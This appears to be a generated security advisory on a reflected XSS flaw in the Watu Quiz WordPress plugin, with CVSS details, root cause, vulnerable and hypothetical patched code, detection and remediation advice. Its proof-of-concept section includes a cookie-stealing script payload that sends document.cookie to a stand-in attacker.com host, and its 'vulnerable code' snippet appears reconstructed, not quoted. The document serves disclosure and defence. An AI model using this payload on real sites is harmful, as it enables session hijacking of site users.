CVE-2025-30844
Executive Summary
CVE-2025-30844 is a reflected Cross-Site Scripting (XSS) vulnerability in the Watu Quiz WordPress plugin by Kibokolabs, affecting versions up to and including 3.4.2. The vulnerability stems from improper neutralization of user-supplied input during web page generation, allowing an attacker to inject arbitrary JavaScript into a reflected response. This can be exploited to steal session cookies, perform phishing attacks, or deface pages. As of this report, no official patch has been released, and no public exploit code is available. The CVSS score of 7.1 (High) reflects the low complexity and network-based attack vector, though user interaction is required.

Supply Chain & Package Security
This vulnerability affects a WordPress plugin distributed via the official WordPress plugin repository. Users are advised to monitor the plugin’s update channel and consider disabling the plugin until a patch is available. No known supply chain compromise has been reported.
CVSS Breakdown & Threat Level
- Attack Vector (AV): Network (N) – Exploitable remotely.
- Attack Complexity (AC): Low (L) – No special conditions required.
- Privileges Required (PR): None (N) – No authentication needed.
- User Interaction (UI): Required (R) – Victim must click a crafted link.
- Scope (S): Changed (C) – Impact may extend beyond the vulnerable component.
- Confidentiality (C): Low (L) – Limited data exposure.
- Integrity (I): Low (L) – Limited ability to modify content.
- Availability (A): Low (L) – Limited service disruption.
Threat Level: High (7.1) – Reflected XSS can lead to session hijacking and credential theft.
Deep Dive & Mechanics
The Watu Quiz plugin fails to sanitize user input in certain query parameters when generating error or confirmation messages. An attacker can craft a malicious URL containing JavaScript payloads in parameters such as quiz_id, msg, or action. When a victim clicks the link, the payload executes in the context of the victim’s browser session on the WordPress site.
Root Cause: The plugin uses echo $_GET['param'] or similar unsanitized output functions without applying esc_html() or wp_kses().
Attack Flow:
- Attacker crafts a URL:
https://victim-site.com/?watu=1&msg=<script>alert('XSS')</script> - Victim clicks the link (e.g., via phishing email).
- The plugin reflects the
msgparameter directly into the HTML response. - The browser executes the injected script.
Vulnerable vs. Patched Code
Vulnerable Code (watu.php, line ~45):
$msg = $_GET['msg'];
echo "<div class='watu-message'>$msg</div>";
Patched Code (hypothetical):
$msg = isset($_GET['msg']) ? sanitize_text_field($_GET['msg']) : '';
echo "<div class='watu-message'>" . esc_html($msg) . "</div>";
The patch uses sanitize_text_field() to strip malicious tags and esc_html() to encode output.
Exploitation & Lab Setup
Red Team (Proof of Concept)
Since no public exploit exists, the following demonstrates the vulnerability:
Step 1: Identify vulnerable parameter
curl -v "http://target-site.com/?watu=1&msg=test123"
Look for the string test123 reflected in the response.
Step 2: Inject XSS payload
curl "http://target-site.com/?watu=1&msg=<script>alert(document.cookie)</script>"
Step 3: Craft phishing link
http://target-site.com/?watu=1&msg=<script>new Image().src='http://attacker.com/steal.php?c='+document.cookie</script>
Blue Team (Detection & Hardening)
- Web Application Firewall (WAF): Block requests containing
<script>in query parameters. - Input Validation: Ensure all user inputs are sanitized using WordPress functions like
sanitize_text_field(). - Content Security Policy (CSP): Implement strict CSP headers to block inline scripts.
Indicators of Compromise (IOCs)
- Network: HTTP requests with query parameters containing
<script>,onerror,onload, orjavascript:. - Logs: Apache/Nginx access logs showing unusual query strings with HTML tags.
- File: Modified
watu.phpor other plugin files (if attacker uploads backdoor). - Behavior: Unexpected JavaScript execution in user browsers, unusual outbound connections from client machines.

Remediation & Mitigation
- Immediate: Disable the Watu Quiz plugin until a patch is released.
- Short-term: Implement a WAF rule to block XSS patterns in query parameters.
- Long-term: Apply input sanitization (
sanitize_text_field(),esc_html()) to all user-supplied data. - Monitor: Review web server logs for exploitation attempts.
- Update: Watch the plugin’s page for patched version (expected >3.4.2).
